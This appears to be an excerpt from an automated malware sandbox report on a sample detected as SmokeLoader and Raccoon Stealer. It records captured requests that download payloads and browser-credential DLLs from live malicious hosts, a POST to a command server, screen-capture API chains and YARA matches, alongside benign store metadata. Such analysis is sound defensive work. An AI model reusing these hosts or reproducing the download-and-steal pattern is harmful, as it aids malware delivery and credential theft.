Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000D.00000002.314293390.000002BED9A13000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000002.314440855.000002BED9A3C000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000D.00000003.313470239.000002BED9A56000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000D.00000003.313470239.000002BED9A56000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000D.00000003.289909839.000002BED9A31000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000D.00000002.314431106.000002BED9A3A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000D.00000002.314485514.000002BED9A4D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/
Source: B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/g
Source: B483.exe, 0000001B.00000002.517044873.0000000002DDD000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/s
Source: B483.exe, 0000001B.00000002.517168204.0000000002DE6000.00000004.00000001.sdmp	String found in binary or memory: https://telete.in/xylichanjk
Source: svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000013.00000003.363538844.0000020C47B7A000.00000004.00000001.sdmp	String found in binary or memory: https://www.roblox.com/info/privacy
Source: svchost.exe, 00000013.00000003.354398985.0000020C47B74000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: unknown

DNS traffic detected: queries for: readinglistforaugust1.xyz

Source: C:\Users\user\AppData\Local\Temp\CA2F.exe

Code function: 31_2_0040B048 __EH_prolog3_GS,DeleteUrlCacheEntry,DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

31_2_0040B048

Source: global traffic	HTTP traffic detected: GET /reestr.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /raccon.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: readinglistforaugust3.xyz
Source: global traffic	HTTP traffic detected: GET /@Rarenut0.exe HTTP/1.1Host: swretjhwrtj.gqConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /5.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.49.70.90:2080
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 188.34.200.103Connection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.230.143.48
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 185.230.143.48
Source: unknown	TCP traffic detected without corresponding DNS query: 185.230.143.48
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.200.103

Source: svchost.exe, 00000013.00000003.366834678.0000020C47B3A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-23T08:01:09.2952074Z\|\|.\|\|5926636f-3c90-4efa-a784-6459d1d5d82c\|\|1152921505693802874\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000013.00000003.366834678.0000020C47B3A000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-08-23T08:01:09.2952074Z\|\|.\|\|5926636f-3c90-4efa-a784-6459d1d5d82c\|\|1152921505693802874\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
Source: svchost.exe, 00000013.00000003.352002441.0000020C47BA5000.00000004.00000001.sdmp	String found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://readinglistforaugust3.xyz/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: readinglistforaugust3.xyz

Source: unknown

HTTPS traffic detected: 74.114.154.22:443 -> 192.168.2.7:49717 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Show sources

Source: Yara match	File source: 3.1.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.69CDTt1pad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.1.tvvihsf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.382323711.00000000005A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319923484.0000000002061000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.382285678.0000000000580000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.319622428.0000000000460000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\B483.exe

Code function: 27_2_0042B2AF __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,

27_2_0042B2AF

Source: 69CDTt1pad.exe, 00000001.00000002.243930275.0000000002F8A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Raccoon Stealer

Show sources

Source: Yara match	File source: 27.3.B483.exe.4870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.3.B483.exe.4870000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.B483.exe.47e0e50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B483.exe.47e0e50.1.raw.unpack, type: UNPACKEDPE
